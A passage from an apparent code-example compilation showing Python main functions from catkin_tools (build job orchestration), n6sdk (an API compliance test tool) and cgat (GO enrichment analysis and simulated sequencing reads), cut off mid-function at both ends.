                        ct_prebuild_pkg,
                        ct_prebuild_pkg_path,
                        dependencies=[],
                        dry_run=False,
                        clean_build=True,
                        clean_devel=True,
                        clean_install=True)

                    # TODO: Build catkin package
                    prebuild_pkg_path, prebuild_pkg = pkg_dict['catkin']
                    prebuild_pkg_deps.append('catkin_tools_prebuild')
            else:
                # How did these get here??
                log("Warning: devel space setup files have an unknown origin.")
        else:
            # Setup util needs to be generated
            if catkin_built or prebuild_built:
                log("Warning: generated devel space setup files have been deleted.")

            if catkin_present:
                # Build catkin package
                prebuild_pkg_path, prebuild_pkg = pkg_dict['catkin']
            else:
                # Generate and buildexplicit prebuild package
                prebuild_pkg_path = get_prebuild_package(context.build_space_abs, context.devel_space_abs, force_cmake)
                prebuild_pkg = parse_package(prebuild_pkg_path)

        if prebuild_pkg is not None:
            # Create the prebuild job
            prebuild_job = create_catkin_build_job(
                context,
                prebuild_pkg,
                prebuild_pkg_path,
                dependencies=prebuild_pkg_deps,
                force_cmake=force_cmake,
                pre_clean=pre_clean,
                prebuild=True)

            # Add the prebuld job
            prebuild_jobs[prebuild_job.jid] = prebuild_job

    # Remove prebuild jobs from normal job list
    for prebuild_jid, prebuild_job in prebuild_jobs.items():
        if prebuild_jid in packages_to_be_built_names:
            packages_to_be_built_names.remove(prebuild_jid)

    # Initial jobs list is just the prebuild jobs
    jobs = [] + list(prebuild_jobs.values())

    # Get all build type plugins
    build_job_creators = {
        ep.name: ep.load()['create_build_job']
        for ep in pkg_resources.iter_entry_points(group='catkin_tools.jobs')
    }

    # It's a problem if there aren't any build types available
    if len(build_job_creators) == 0:
        sys.exit('Error: No build types available. Please check your catkin_tools installation.')

    # Construct jobs
    for pkg_path, pkg in all_packages:
        if pkg.name not in packages_to_be_built_names:
            continue

        # Ignore metapackages
        if 'metapackage' in [e.tagname for e in pkg.exports]:
            continue

        # Get actual execution deps
        deps = [
            p.name for _, p
            in get_cached_recursive_build_depends_in_workspace(pkg, packages_to_be_built)
            if p.name not in prebuild_jobs
        ]
        # All jobs depend on the prebuild jobs if they're defined
        if not no_deps:
            for j in prebuild_jobs.values():
                deps.append(j.jid)

        # Determine the job parameters
        build_job_kwargs = dict(
            context=context,
            package=pkg,
            package_path=pkg_path,
            dependencies=deps,
            force_cmake=force_cmake,
            pre_clean=pre_clean)

        # Create the job based on the build type
        build_type = get_build_type(pkg)

        if build_type in build_job_creators:
            jobs.append(build_job_creators[build_type](**build_job_kwargs))
        else:
            wide_log(clr(
                "[build] @[email protected]{yf}Warning:@| Skipping package `{}` because it "
                "has an unsupported package build type: `{}`"
            ).format(pkg.name, build_type))

            wide_log(clr("[build] Note: Available build types:"))
            for bt_name in build_job_creators.keys():
                wide_log(clr("[build]  - `{}`".format(bt_name)))

    # Queue for communicating status
    event_queue = Queue()

    try:
        # Spin up status output thread
        status_thread = ConsoleStatusController(
            'build',
            ['package', 'packages'],
            jobs,
            n_jobs,
            [pkg.name for _, pkg in context.packages],
            [p for p in context.whitelist],
            [p for p in context.blacklist],
            event_queue,
            show_notifications=not no_notify,
            show_active_status=not no_status,
            show_buffered_stdout=not quiet and not interleave_output,
            show_buffered_stderr=not interleave_output,
            show_live_stdout=interleave_output,
            show_live_stderr=interleave_output,
            show_stage_events=not quiet,
            show_full_summary=(summarize_build is True),
            pre_start_time=pre_start_time,
            active_status_rate=limit_status_rate)
        status_thread.start()

        # Initialize locks
        locks = {
            'installspace': asyncio.Lock() if lock_install else FakeLock()
        }

        # Block while running N jobs asynchronously
        try:
            all_succeeded = run_until_complete(execute_jobs(
                'build',
                jobs,
                locks,
                event_queue,
                context.log_space_abs,
                max_toplevel_jobs=n_jobs,
                continue_on_failure=continue_on_failure,
                continue_without_deps=False))
        except Exception:
            status_thread.keep_running = False
            all_succeeded = False
            status_thread.join(1.0)
            wide_log(str(traceback.format_exc()))

        status_thread.join(1.0)

        # Warn user about new packages
        now_built_packages, now_unbuilt_pkgs = get_built_unbuilt_packages(context, workspace_packages)
        new_pkgs = [p for p in unbuilt_pkgs if p not in now_unbuilt_pkgs]
        if len(new_pkgs) > 0:
            log(clr("[build] @/@!Note:@| @/Workspace packages have changed, "
                    "please re-source setup files to use [email protected]|"))

        if all_succeeded:
            # Create isolated devel setup if necessary
            if context.isolate_devel:
                if not context.install:
                    _create_unmerged_devel_setup(context, now_unbuilt_pkgs)
                else:
                    _create_unmerged_devel_setup_for_install(context)
            return 0
        else:
            return 1

    except KeyboardInterrupt:
        wide_log("[build] Interrupted by user!")
        event_queue.put(None)

Example 24

Project: n6sdk
Source File: api_test_tool.py
View license
def main():
    requests.packages.urllib3.disable_warnings()  # to turn off InsecureRequestWarning

    parser = argparse.ArgumentParser()
    excl_args = parser.add_mutually_exclusive_group(required=True)
    excl_args.add_argument(
        '--generate-config',
        action='store_true',
        help='generate the config file template, then exit')
    excl_args.add_argument(
        '-c', '--config',
        help='test an n6-like API using the specified config file')
    parser.add_argument(
        '-v', '--verbose',
        action='store_true',
        help='be more descriptive')
    args = parser.parse_args()

    if args.generate_config:
        for line in get_config_base_lines():
            print line  # using OS-specific newlines
        sys.exit(0)

    config_handler, config = get_config(args.config)

    # Preparing stuff
    ca_cert = config.get('cert_path', None)
    ca_key = config.get('key_path', None)
    base_url = get_base_url(config.get('base_url'))
    constant_params_list = config_handler.options('constant_params')
    constant_params = dict((item, config.get(item)) for item in constant_params_list)

    report = Report()
    ds_test = DataSpecTest()
    client = APIClient(ca_cert, ca_key, verify=False)

    #
    # Testing basic search url response and data_spec compatibility
    #

    report.section("Testing basic search query. Getting representative data sample", 1)
    data_url = make_url(base_url, constant_params)

    # Prepare data range sets for each key of returned json objects
    data_range = defaultdict(set)
    composed_keys = set([u'address', u'client', u'injects'])
    additional_attributes = set([])

    report.info('Inferring data structure model + testing basic compliance', 1)
    if args.verbose:
        report.info('Testing URL: "{}"'.format(data_url), 1)
    try:
        response = client.get_stream(data_url)
        for data in response:
            for key, val in data.viewitems():
                if key in composed_keys:
                    val = cjson.encode(val)
                try:
                    data_range[key].add(val)
                except TypeError:
                    report.info(
                        "Additional composed items detected in API response: {}".format(key), 1)

                ds_test.validate_data_format(data)
                if args.verbose:
                    report.info("OK, proper result item", 1)

            # test for n6-specific keys
            nonstandard_keys = ds_test.get_nonstandard_fields(data)
            for key in nonstandard_keys:
                additional_attributes.add(key)

        report.info("Non-standard keys found: {}".format(
            ", ".join(
                '"{}"'.format(k)
                for k in sorted(additional_attributes))), 1)
        report.info("Returned data seems to be properly formatted", 1)

    except APIClientException as e:
        sys.exit("FATAL ERROR: {}".format(e))
    except APIValidatorException as e:
        report.error("Data validation error: {}".format(e), 1)

    #
    # Make request with legal params
    #

    report.section("Testing a query with two random LEGAL params", 2)
    MAX_RETRY = 100
    optional_params_keys = set(data_range.viewkeys()) - set(constant_params)
    optional_params_keys = ds_test.all_param_keys.intersection(optional_params_keys)
    for i in xrange(MAX_RETRY):
        rand_keys = random.sample(optional_params_keys, 2)
        rand_vals = (random.sample(data_range[val], 1)[0] for val in rand_keys)
        optional_params = dict(zip(rand_keys, rand_vals))
        legal_query_url = make_url(base_url, constant_params, optional_params)
        test_legal_ok = True
        try:
            filtered_legal = client.get_stream(legal_query_url)
            something_processed = False
            for record in filtered_legal:
                if not something_processed:
                    something_processed = True
                    if args.verbose:
                        report.info('Testing URL: "{}"'.format(legal_query_url), 2)
                for key, val in record.viewitems():
                    if key in optional_params and val != optional_params[key]:
                        report.error('Wrong filtering result with query: {}'.format(
                            optional_params), 2)
                    else:
                        if args.verbose:
                            report.info('OK, proper result item', 2)
            if something_processed:
                break
        except APIClientException as e:
            test_legal_ok = False
            report.error("Connection exception: {}".format(e), 2)
            break
    if not something_processed:
        report.error("Could not pick any pair of random legal keys", 2)
    elif test_legal_ok:
        report.info("Filtering seems to work as expected", 2)

    #
    # Make request with illegal params
    #

    report.section("Testing queries with ILLEGAL params", 3)
    illegal_query_urls = []
    illegal_keys = data_range.viewkeys() - ds_test.all_param_keys - composed_keys
    illegal_keys = illegal_keys.difference(additional_attributes)
    illegal_vals = (random.sample(data_range[val], 1)[0] for val in illegal_keys)
    illegal_params = dict(zip(illegal_keys, illegal_vals))

    for key, val in illegal_params.viewitems():
        illegal_query_urls.append(make_url(base_url, constant_params, {key: val}))

    test_illegal_ok = True
    for illegal in illegal_query_urls:
        if args.verbose:
            report.info('Testing illegal URL: "{}"'.format(illegal), 3)
        try:
            filtered_illegal = client.get_stream(illegal)
            for record in filtered_illegal:
                pass
            code = client.status()
        except APIClientException as e:
            code = getattr(e, 'code', None)
        if code == requests.codes.bad_request:
            if args.verbose:
                report.info("OK, proper behaviour: {}".format(e), 3)
        else:
            test_illegal_ok = False
            if code is None:
                report.error("Connection exception: {}".format(e), 3)
            else:
                report.error("Wrong response code: {}, should be: 400 (Bad Request).".format(
                    code), 3)
    if test_illegal_ok:
        report.info("Query validation seems to work as expected", 3)

    #
    # Make request with legal all single params
    #

    report.section("Testing queries with all single LEGAL params", 4)
    MINIMUM_VALUE_NUMBER = 3
    keys_list = []
    test_single_legal_ok = True
    for optional_key in optional_params_keys:
        if len(data_range[optional_key]) >= MINIMUM_VALUE_NUMBER:
            keys_list.append(optional_key)
        rand_val = random.sample(data_range[optional_key], 1)[0]
        opt_param = {optional_key: rand_val}
        legal_query_url = (make_url(base_url, constant_params, opt_param))
        if args.verbose:
            report.info('Testing URL: "{}"'.format(legal_query_url), 4)
        try:
            filtered_legal = client.get_stream(legal_query_url)
            for record in filtered_legal:
                for key, val in record.viewitems():
                    if key in opt_param and val != opt_param[key]:
                        report.error('Wrong filtering result with query: {}'.format(
                            opt_param), 4)
                    else:
                        if args.verbose:
                            report.info('OK, proper result item', 4)
        except APIClientException as err:
            test_single_legal_ok = False
            report.error("Connection exception: {}".format(err), 4)
    if test_single_legal_ok:
        report.info("Filtering seems to work as expected", 4)

    #
    # Make request with legal list params
    #

    report.section("Testing queries with a LEGAL param, using different values", 5)
    test_key = random.choice(keys_list)
    random_val_list = random.sample(data_range[test_key], MINIMUM_VALUE_NUMBER)
    test_list_legal_ok = True
    for test_value in random_val_list:
        opt_param = {test_key: test_value}
        legal_query_url = (make_url(base_url, constant_params, opt_param))
        if args.verbose:
            report.info('Testing URL: "{}"'.format(legal_query_url), 5)
        try:
            filtered_legal = client.get_stream(legal_query_url)
            for record in filtered_legal:
                for key, val in record.viewitems():
                    if key in opt_param and val != opt_param[key]:
                        report.error('Wrong filtering result with query: {}'.format(
                            opt_param), 5)
                    else:
                        if args.verbose:
                            report.info('OK, proper result item', 5)
        except APIClientException as err:
            test_list_legal_ok = False
            report.error("Connection exception: {}".format(err), 5)
    if test_list_legal_ok:
        report.info("Filtering seems to work as expected", 5)

    report.show()

    if report.has_errors():
        sys.exit(1)
    else:
        sys.exit(0)

Example 25

Project: cgat
Source File: runGO.py
View license
def main(argv=None):

    parser = E.OptionParser(
        version="%prog version: $Id$",
        usage=globals()["__doc__"])

    parser.add_option(
        "-s", "--species", dest="species", type="string",
        help="species to use [default=%default].")

    parser.add_option(
        "-i", "--slims", dest="filename_slims", type="string",
        help="filename with GO SLIM categories "
        "[default=%default].")

    parser.add_option(
        "-g", "--genes-tsv-file", dest="filename_genes", type="string",
        help="filename with genes to analyse "
        "[default=%default].")

    parser.add_option(
        "-b", "--background-tsv-file", dest="filename_background",
        type="string",
        help="filename with background genes to analyse "
        "[default=%default].")

    parser.add_option(
        "-m", "--min-counts", dest="minimum_counts",
        type="int",
        help="minimum count - ignore all categories that have "
        "fewer than # number of genes"
        " [default=%default].")

    parser.add_option(
        "-o", "--sort-order", dest="sort_order", type="choice",
        choices=("fdr", "pvalue", "ratio"),
        help="output sort order [default=%default].")

    parser.add_option(
        "--ontology", dest="ontology", type="string",
        action="append",
        help="go ontologies to analyze. Ontologies are tested "
        "separately [default=%default].")

    parser.add_option(
        "-t", "--threshold", dest="threshold", type="float",
        help="significance threshold [>1.0 = all ]. If --fdr is set, this "
        "refers to the fdr, otherwise it is a cutoff for p-values.")

    parser.add_option(
        "--filename-dump", dest="filename_dump", type="string",
        help="dump GO category assignments into a flatfile "
        "[default=%default].")

    parser.add_option(
        "--gene2name-map-tsv-file", dest="filename_gene2name", type="string",
        help="optional filename mapping gene identifiers to gene names "
        "[default=%default].")

    parser.add_option(
        "--filename-ontology", dest="filename_ontology", type="string",
        help="filename with ontology in OBO format [default=%default].")

    parser.add_option(
        "--filename-input", dest="filename_input", type="string",
        help="read GO category assignments from a flatfile "
        "[default=%default].")

    parser.add_option(
        "--sample-size", dest="sample", type="int",
        help="do sampling (with # samples) [default=%default].")

    parser.add_option(
        "--filename-output-pattern", "--output-filename-pattern",
        dest="output_filename_pattern", type="string",
        help="pattern with output filename pattern "
        "(should contain: %(go)s and %(section)s ) [default=%default]")

    parser.add_option(
        "--fdr", dest="fdr", action="store_true",
        help="calculate and filter by FDR default=%default].")

    parser.add_option(
        "--go2goslim", dest="go2goslim", action="store_true",
        help="convert go assignments in STDIN to goslim assignments and "
        "write to STDOUT [default=%default].")

    parser.add_option(
        "--gene-pattern", dest="gene_pattern", type="string",
        help="pattern to transform identifiers to GO gene names "
        "[default=%default].")

    parser.add_option(
        "--filename-map-slims", dest="filename_map_slims", type="string",
        help="write mapping between GO categories and GOSlims "
        "[default=%default].")

    parser.add_option(
        "--get-genes", dest="get_genes", type="string",
        help="list all genes in the with a certain GOID [default=%default].")

    parser.add_option(
        "--strict", dest="strict", action="store_true",
        help="require all genes in foreground to be part of background. "
        "If not set, genes in foreground will be added to the background "
        "[default=%default].")

    parser.add_option(
        "-q", "--fdr-method", dest="qvalue_method", type="choice",
        choices=("empirical", "storey", "BH"),
        help="method to perform multiple testing correction by controlling "
        "the fdr [default=%default].")

    parser.add_option(
        "--pairwise", dest="compute_pairwise", action="store_true",
        help="compute pairwise enrichment for multiple gene lists. "
        "[default=%default].")

    # parser.add_option( "--fdr-lambda", dest="qvalue_lambda", type="float",
    #                   help="fdr computation: lambda [default=%default]."  )

    # parser.add_option( "--qvalue-pi0-method", dest="qvalue_pi0_method", type="choice",
    #                    choices = ("smoother", "bootstrap" ),
    # help="fdr computation: method for estimating pi0 [default=%default]."  )

    parser.set_defaults(species=None,
                        filename_genes="-",
                        filename_background=None,
                        filename_slims=None,
                        minimum_counts=0,
                        ontology=[],
                        filename_dump=None,
                        sample=0,
                        fdr=False,
                        output_filename_pattern=None,
                        threshold=0.05,
                        filename_map_slims=None,
                        gene_pattern=None,
                        sort_order="ratio",
                        get_genes=None,
                        strict=False,
                        qvalue_method="empirical",
                        pairs_min_observed_counts=3,
                        compute_pairwise=False,
                        filename_gene2name=None
                        )

    (options, args) = E.Start(parser, add_database_options=True)

    if options.go2goslim:
        GO.convertGo2Goslim(options)
        E.Stop()
        sys.exit(0)

    if options.fdr and options.sample == 0:
        E.warn("fdr will be computed without sampling")

    #############################################################
    # dump GO
    if options.filename_dump:
        # set default orthologies to GO
        if not options.ontology:
            options.ontology = [
                "biol_process", "mol_function", "cell_location"]

        E.info("dumping GO categories to %s" % (options.filename_dump))

        dbhandle = connectToEnsembl(options)

        outfile = IOTools.openFile(options.filename_dump, "w", create_dir=True)
        GO.DumpGOFromDatabase(outfile,
                              dbhandle,
                              options)
        outfile.close()
        E.Stop()
        sys.exit(0)

    #############################################################
    # read GO categories from file
    if options.filename_input:
        E.info("reading association of categories and genes from %s" %
               (options.filename_input))
        infile = IOTools.openFile(options.filename_input)
        gene2gos, go2infos = GO.ReadGene2GOFromFile(infile)
        infile.close()

    if options.filename_gene2name:
        E.info("reading gene identifier to gene name mapping from %s" %
               options.filename_gene2name)
        infile = IOTools.openFile(options.filename_gene2name)
        gene2name = IOTools.readMap(infile, has_header=True)
        infile.close()
        E.info("read %i gene names for %i gene identifiers" %
               (len(set(gene2name.values())),
                len(gene2name)))
    else:
        # use identity mapping
        gene2name = dict([(x, x) for x in list(gene2gos.keys())])

    #############################################################
    # read GO ontology from file
    if options.filename_ontology:
        E.info("reading ontology from %s" % (options.filename_ontology))

        infile = IOTools.openFile(options.filename_ontology)
        ontology = GO.readOntology(infile)
        infile.close()

        def _g():
            return collections.defaultdict(GO.GOInfo)
        go2infos = collections.defaultdict(_g)

        # substitute go2infos
        for go in list(ontology.values()):
            go2infos[go.mNameSpace][go.mId] = GO.GOInfo(
                go.mId,
                go_type=go.mNameSpace,
                description=go.mName)

    #############################################################
    # get foreground gene list
    input_foreground, genelists = GO.ReadGeneLists(
        options.filename_genes,
        gene_pattern=options.gene_pattern)

    E.info("read %i genes for forground in %i gene lists" %
           (len(input_foreground), len(genelists)))

    #############################################################
    # get background
    if options.filename_background:

        # nick - bug fix: background is the first tuple element from
        # ReadGeneLists
        input_background = GO.ReadGeneLists(
            options.filename_background,
            gene_pattern=options.gene_pattern)[0]
        E.info("read %i genes for background" % len(input_background))
    else:
        input_background = None

    #############################################################
    # sort out which ontologies to test
    if not options.ontology:
        if options.filename_input:
            options.ontology = list(gene2gos.keys())

    E.info("found %i ontologies: %s" %
           (len(options.ontology), options.ontology))

    summary = []
    summary.append("\t".join((
        "genelist",
        "ontology",
        "significant",
        "threshold",
        "ngenes",
        "ncategories",
        "nmaps",
        "nforegound",
        "nforeground_mapped",
        "nbackground",
        "nbackground_mapped",
        "nsample_counts",
        "nbackground_counts",
        "psample_assignments",
        "pbackground_assignments",
        "messages")) + "\n")

    #############################################################
    # get go categories for genes
    for test_ontology in sorted(options.ontology):

        # store results for aggregate output of multiple gene lists
        all_results = []
        all_significant_results = []
        all_genelists_with_results = []

        E.info("working on ontology %s" % test_ontology)
        #############################################################
        # get/read association of GO categories to genes
        if options.filename_input:
            gene2go, go2info = gene2gos[test_ontology], go2infos[test_ontology]
        else:
            E.info("reading data from database ...")

            dbhandle.Connect(options)
            gene2go, go2info = GO.ReadGene2GOFromDatabase(
                dbhandle,
                test_ontology,
                options.database, options.species)

            E.info("finished")

        if len(go2info) == 0:
            E.warn(
                "could not find information for terms - "
                "could be mismatch between ontologies")

        ngenes, ncategories, nmaps, counts_per_category = GO.CountGO(gene2go)
        E.info("assignments found: %i genes mapped to %i categories "
               "(%i maps)" %
               (ngenes, ncategories, nmaps))

        if options.minimum_counts > 0:
            to_remove = set(
                [x for x, y in counts_per_category.items()
                 if y < options.minimum_counts])
            E.info("removing %i categories with less than %i genes" %
                   (len(to_remove), options.minimum_counts))
            GO.removeCategories(gene2go, to_remove)

            ngenes, ncategories, nmaps, counts_per_category = \
                GO.CountGO(gene2go)
            E.info("assignments after filtering: %i genes mapped "
                   "to %i categories (%i maps)" % (
                       ngenes, ncategories, nmaps))

        for genelist_name, foreground in sorted(genelists.items()):

            msgs = []
            E.info("processing %s with %i genes" %
                   (genelist_name, len(foreground)))
            ##################################################################
            ##################################################################
            ##################################################################
            # build background - reconcile with foreground
            ##################################################################
            if input_background is None:
                background = list(gene2go.keys())
            else:
                background = list(input_background)

            # nick - bug-fix backgorund included the foreground in a tuple.
            # background is the first tuple element
            missing = foreground.difference(set(background))

            if options.strict:
                assert len(missing) == 0, \
                    "%i genes in foreground but not in background: %s" % (
                        len(missing), str(missing))
            else:
                if len(missing) != 0:
                    E.warn("%i genes in foreground that are not in "
                           "background - added to background of %i" %
                           (len(missing), len(background)))

                background.extend(missing)

            E.info("(unfiltered) foreground=%i, background=%i" %
                   (len(foreground), len(background)))

            # sort foreground and background, important for reproducibility
            # under random seed
            foreground = sorted(foreground)
            background = sorted(background)

            #############################################################
            # sanity checks:
            # are all of the foreground genes in the dataset
            # missing = set(genes).difference( set(gene2go.keys()) )
            # assert len(missing) == 0, "%i genes in foreground set without GO annotation: %s" % (len(missing), str(missing))

            #############################################################
            # read GO slims and map GO categories to GO slim categories
            if options.filename_slims:
                go_slims = GO.GetGOSlims(
                    IOTools.openFile(options.filename_slims, "r"))

                if options.loglevel >= 1:
                    v = set()
                    for x in list(go_slims.values()):
                        for xx in x:
                            v.add(xx)
                    options.stdlog.write(
                        "# read go slims from %s: go=%i, slim=%i\n" %
                        (options.filename_slims,
                         len(go_slims),
                         len(v)))

                if options.filename_map_slims:
                    if options.filename_map_slims == "-":
                        outfile = options.stdout
                    else:
                        outfile = IOTools.openFile(
                            options.filename_map_slims, "w")

                    outfile.write("GO\tGOSlim\n")
                    for go, go_slim in sorted(list(go_slims.items())):
                        outfile.write("%s\t%s\n" % (go, go_slim))

                    if outfile != options.stdout:
                        outfile.close()

                gene2go = GO.MapGO2Slims(gene2go, go_slims, ontology=ontology)

                if options.loglevel >= 1:
                    ngenes, ncategories, nmaps, counts_per_category = \
                        GO.CountGO(gene2go)
                    options.stdlog.write(
                        "# after go slim filtering: %i genes mapped to "
                        "%i categories (%i maps)\n" % (
                            ngenes, ncategories, nmaps))

            #############################################################
            # Just dump out the gene list
            if options.get_genes:
                fg, bg, ng = [], [], []

                for gene, vv in list(gene2go.items()):
                    for v in vv:
                        if v.mGOId == options.get_genes:
                            if gene in genes:
                                fg.append(gene)
                            elif gene in background:
                                bg.append(gene)
                            else:
                                ng.append(gene)

                # skip to next GO class
                if not (bg or ng):
                    continue

                options.stdout.write(
                    "# genes in GO category %s\n" % options.get_genes)
                options.stdout.write("gene\tset\n")
                for x in sorted(fg):
                    options.stdout.write("%s\t%s\n" % ("fg", x))
                for x in sorted(bg):
                    options.stdout.write("%s\t%s\n" % ("bg", x))
                for x in sorted(ng):
                    options.stdout.write("%s\t%s\n" % ("ng", x))

                E.info("nfg=%i, nbg=%i, nng=%i" % (len(fg), len(bg), len(ng)))

                E.Stop()
                sys.exit(0)

            #############################################################
            outfile = GO.getFileName(options,
                                     go=test_ontology,
                                     section='foreground',
                                     set=genelist_name)

            outfile.write("gene_id\n%s\n" % ("\n".join(sorted(foreground))))
            if options.output_filename_pattern:
                outfile.close()

            outfile = GO.getFileName(options,
                                     go=test_ontology,
                                     section='background',
                                     set=genelist_name)

            # Jethro bug fix - see section 'build background' for assignment
            outfile.write("gene_id\n%s\n" % ("\n".join(sorted(background))))
            if options.output_filename_pattern:
                outfile.close()

            #############################################################
            # do the analysis
            go_results = GO.AnalyseGO(gene2go, foreground, background)

            if len(go_results.mSampleGenes) == 0:
                E.warn("%s: no genes with GO categories - analysis aborted" %
                       genelist_name)
                continue

            pairs = list(go_results.mResults.items())

            #############################################################
            # calculate fdr for each hypothesis
            if options.fdr:
                fdrs, samples, method = GO.computeFDRs(go_results,
                                                       foreground,
                                                       background,
                                                       options,
                                                       test_ontology,
                                                       gene2go,
                                                       go2info)
                for x, v in enumerate(pairs):
                    v[1].mQValue = fdrs[v[0]][0]
            else:
                fdrs, samples, method = {}, {}, None

            msgs.append("fdr=%s" % method)

            if options.sort_order == "fdr":
                pairs.sort(key=lambda x: x[1].mQValue)
            elif options.sort_order == "ratio":
                pairs.sort(key=lambda x: x[1].mRatio)
            elif options.sort_order == "pvalue":
                pairs.sort(key=lambda x: x[1].mPValue)

            #############################################################
            #############################################################
            #############################################################
            # output the full result
            outfile = GO.getFileName(options,
                                     go=test_ontology,
                                     section='overall',
                                     set=genelist_name)

            GO.outputResults(
                outfile, pairs, go2info, options, fdrs=fdrs, samples=samples)

            if options.output_filename_pattern:
                outfile.close()

            #############################################################
            #############################################################
            #############################################################
            # filter significant results and output
            filtered_pairs = GO.selectSignificantResults(pairs, fdrs, options)

            nselected = len(filtered_pairs)
            nselected_up = len([x for x in filtered_pairs if x[1].mRatio > 1])
            nselected_down = len(
                [x for x in filtered_pairs if x[1].mRatio < 1])

            assert nselected_up + nselected_down == nselected

            outfile = GO.getFileName(options,
                                     go=test_ontology,
                                     section='results',
                                     set=genelist_name)

            GO.outputResults(outfile,
                             filtered_pairs,
                             go2info,
                             options,
                             fdrs=fdrs,
                             samples=samples)

            if options.output_filename_pattern:
                outfile.close()

            #############################################################
            #############################################################
            #############################################################
            # save results for multi-gene-list analysis
            all_results.append(pairs)
            all_significant_results.append(filtered_pairs)
            all_genelists_with_results.append(genelist_name)

            #############################################################
            #############################################################
            #############################################################
            # output parameters
            ngenes, ncategories, nmaps, counts_per_category = \
                GO.CountGO(gene2go)

            outfile = GO.getFileName(options,
                                     go=test_ontology,
                                     section='parameters',
                                     set=genelist_name)

            nbackground = len(background)
            if nbackground == 0:
                nbackground = len(go_results.mBackgroundGenes)

            outfile.write(
                "# input go mappings for gene list '%s' and category '%s'\n" %
                (genelist_name, test_ontology))
            outfile.write("parameter\tvalue\tdescription\n")
            outfile.write("mapped_genes\t%i\tmapped genes\n" % ngenes)
            outfile.write(
                "mapped_categories\t%i\tmapped categories\n" % ncategories)
            outfile.write("mappings\t%i\tmappings\n" % nmaps)
            outfile.write("genes_in_fg\t%i\tgenes in foreground\n" %
                          len(foreground))
            outfile.write(
                "genes_in_fg_with_assignment\t%i\tgenes in foreground with GO assignments\n" %
                (len(go_results.mSampleGenes)))
            outfile.write(
                "genes_in_bg\t%i\tinput background\n" % nbackground)
            outfile.write(
                "genes_in_bg_with_assignment\t%i\tgenes in background with GO assignments\n" % (
                len(go_results.mBackgroundGenes)))
            outfile.write(
                "associations_in_fg\t%i\tassociations in sample\n" %
                go_results.mSampleCountsTotal)
            outfile.write(
                "associations_in_bg\t%i\tassociations in background\n" %
                go_results.mBackgroundCountsTotal)
            outfile.write(
                "percent_genes_in_fg_with_association\t%s\tpercent genes in sample with GO assignments\n" % (
                    IOTools.prettyPercent(len(go_results.mSampleGenes),
                                          len(foreground), "%5.2f")))
            outfile.write(
                "percent_genes_in_bg_with_associations\t%s\tpercent genes background with GO assignments\n" % (
                    IOTools.prettyPercent(len(go_results.mBackgroundGenes),
                                          nbackground, "%5.2f")))
            outfile.write(
                "significant\t%i\tsignificant results reported\n" % nselected)
            outfile.write(
                "significant_up\t%i\tsignificant up-regulated results reported\n" % nselected_up)
            outfile.write(
                "significant_down\t%i\tsignificant up-regulated results reported\n" % nselected_down)
            outfile.write(
                "threshold\t%6.4f\tsignificance threshold\n" % options.threshold)

            if options.output_filename_pattern:
                outfile.close()

            summary.append("\t".join(map(str, (
                genelist_name,
                test_ontology,
                nselected,
                options.threshold,
                ngenes,
                ncategories,
                nmaps,
                len(foreground),
                len(go_results.mSampleGenes),
                nbackground,
                len(go_results.mBackgroundGenes),
                go_results.mSampleCountsTotal,
                go_results.mBackgroundCountsTotal,
                IOTools.prettyPercent(
                    len(go_results.mSampleGenes), len(foreground), "%5.2f"),
                IOTools.prettyPercent(
                    len(go_results.mBackgroundGenes), nbackground, "%5.2f"),
                ",".join(msgs)))) + "\n")

            #############################################################
            #############################################################
            #############################################################
            # output the fg patterns
            outfile = GO.getFileName(options,
                                     go=test_ontology,
                                     section='withgenes',
                                     set=genelist_name)

            GO.outputResults(outfile, pairs, go2info, options,
                             fdrs=fdrs,
                             samples=samples,
                             gene2go=gene2go,
                             foreground=foreground,
                             gene2name=gene2name)

            if options.output_filename_pattern:
                outfile.close()

        if len(genelists) > 1:

            ###################################################################
            # output various summary files
            # significant results
            GO.outputMultipleGeneListResults(all_significant_results,
                                             all_genelists_with_results,
                                             test_ontology,
                                             go2info,
                                             options,
                                             section='significant')

            # all results
            GO.outputMultipleGeneListResults(all_results,
                                             all_genelists_with_results,
                                             test_ontology,
                                             go2info,
                                             options,
                                             section='all')

            if options.compute_pairwise:
                GO.pairwiseGOEnrichment(all_results,
                                        all_genelists_with_results,
                                        test_ontology,
                                        go2info,
                                        options)

    outfile_summary = options.stdout
    outfile_summary.write("".join(summary))

    E.Stop()

Example 26

Project: cgat
Source File: GemReads.py
View license
def main(argv):
    refFile=''
    direct=''
    abund=''
    number=''
    length=''
    gens=''
    genDirect=''
    models=''
    circular=False
    qual=''
    out=''
    paired=False
    meta=False
    mean=''
    stdv=''
    try:
        opts, args = getopt.getopt(argv, "hr:R:a:n:g:G:l:m:ce:q:o:u:s:p")
    except getopt.GetoptError:
        usage()
        sys.exit(2)
    for opt, arg in opts:
        if opt == '-h':
            usage()
            sys.exit()
        elif opt == '-r':
            refFile=arg
        elif opt == '-R':
            direct=arg
            meta=True
        elif opt =='-G':
            genDirect=arg
        elif opt == '-a':
            abund=arg
        elif opt == '-n':
            number = int(arg)
        elif opt == '-l':
            if arg=='d':
                length=arg
            else:
                length=int(arg)
        elif opt == '-u':
            if arg=='d':
                mean='emp'
            else:
                mean=int(arg) 
        elif opt == '-s':
            stdv=int(arg)
        elif opt == '-g':
            gens=arg
        elif opt =='-m':
            models=arg
        elif opt =='-c':
            circular=True
        elif opt =='-q':
            qual=int(arg)
        elif opt =='-o':
            out=arg
        elif opt =='-p':
            paired=True
    if number=='' or models=='' or length=='' or qual=='' or out=='':
        usage()
        sys.exit()
    if refFile=='' and direct=='':
        usage()
        sys.exit()
    if paired:
        if mean=='':
            print '\nPlease specify a fragment length\n'
            usage()
            sys.exit()
        rdlog.info('Generating paired end reads.')
        out1=open(out+'_fir.fastq','w')
    	out2=open(out+'_sec.fastq','w')
        rdlog.debug('Parsing model file.')
        mx1,mx2,insD1,insD2,delD1,delD2,intervals,gQualL,bQualL,iQualL,mates,rds,rdLenD=parseModel(models,paired,length)
        rdlog.debug('Model file parsed.')
    else:
        out1=open(out+'_single.fastq','w')
        rdlog.info('Generating single reads.')
        rdlog.debug('Parsing model file.')
        mx1,insD1,delD1,gQualL,bQualL,iQualL,readCount,rdLenD=parseModel(models,paired,length)
        rdlog.debug('Model file parsed.')
        #inserts
        insDict=mkInserts(mx1,insD1)
        #deletions
        delDict=mkDels(mx1,delD1)
    if paired:
        #choose insert length
        m0=float(mates[0])
        m1=float(mates[1])
        rd0=float(rds[0])
        rd1=float(rds[1])
        unAlign0=(m0*rd1-m1*m0)/(rd0*rd1-m1*m0)
        unAlign1=1.0-(unAlign0/(m0/rd0))
        keys=intervals.keys()
        keys.sort()
